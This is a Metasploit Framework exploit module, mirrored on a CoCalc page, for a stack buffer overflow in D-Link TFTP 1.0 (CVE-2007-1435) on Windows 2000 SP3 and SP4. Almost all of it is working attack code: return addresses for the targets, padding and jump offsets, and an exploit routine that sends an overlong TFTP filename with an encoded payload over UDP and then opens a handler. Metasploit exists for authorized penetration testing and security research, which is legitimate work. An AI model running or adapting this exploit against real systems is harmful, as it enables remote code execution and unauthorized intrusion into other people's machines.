Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/tftp/dlink_long_filename.rb
19514 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  include Msf::Exploit::Remote::Udp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'D-Link TFTP 1.0 Long Filename Buffer Overflow',

16
        'Description' => %q{

17
          This module exploits a stack buffer overflow in D-Link TFTP 1.0.

18
          By sending a request for an overly long file name, an attacker

19
          could overflow a buffer and execute arbitrary code. For best results,

20
          use bind payloads with nonx (No NX).

21
        },

22
        'Author' => [

23
          'LSO <lso[at]hushmail.com>', # Exploit module

24
          'aushack', # Refs, stability, targets etc

25
        ],

26
        'References' => [

27
          [ 'CVE', '2007-1435' ],

28
          [ 'OSVDB', '33977' ],

29
          [ 'BID', '22923' ],

30
        ],

31
        'DefaultOptions' => {

32
          'EXITFUNC' => 'process',

33
        },

34
        'Payload' => {

35
          'Space' => 1024,

36
          'BadChars' => "\x00",

37
          'Compat' =>

38
                      {

39
                        'ConnectionType' => '-reverse',

40
                      },

41
        },

42
        'SaveRegisters' => [ 'ecx', 'eax', 'esi' ],

43
        'Platform' => 'win',

44


45
        'Targets' => [

46
          # Patrick tested OK 20090228

47
          ['Windows 2000 SP4 English', { 'Ret' => 0x77e1ccf7 } ], # jmp ebx

48
          ['Windows 2000 SP3 English', { 'Ret' => 0x77f8361b } ], # jmp ebx

49
        ],

50
        'Privileged' => false,

51
        'DisclosureDate' => '2007-03-12',

52
        'DefaultTarget' => 0,

53
        'Notes' => {

54
          'Reliability' => UNKNOWN_RELIABILITY,

55
          'Stability' => UNKNOWN_STABILITY,

56
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

57
        }

58
      )

59
    )

60


61
    register_options(

62
      [

63
        Opt::RPORT(69)

64
      ], self

65
    )

66
  end

67


68
  def exploit

69
    connect_udp

70


71
    print_status("Trying target #{target.name}...")

72


73
    juju = "\x00\x01"

74
    juju << Rex::Text.rand_text_alpha_upper(581)

75
    juju << Rex::Arch::X86.jmp_short(42)

76
    juju << Rex::Text.rand_text_alpha_upper(38)

77
    juju << [target.ret].pack('V') + payload.encoded

78


79
    udp_sock.put(juju)

80


81
    handler

82
    disconnect_udp

83
  end

84
end

85


86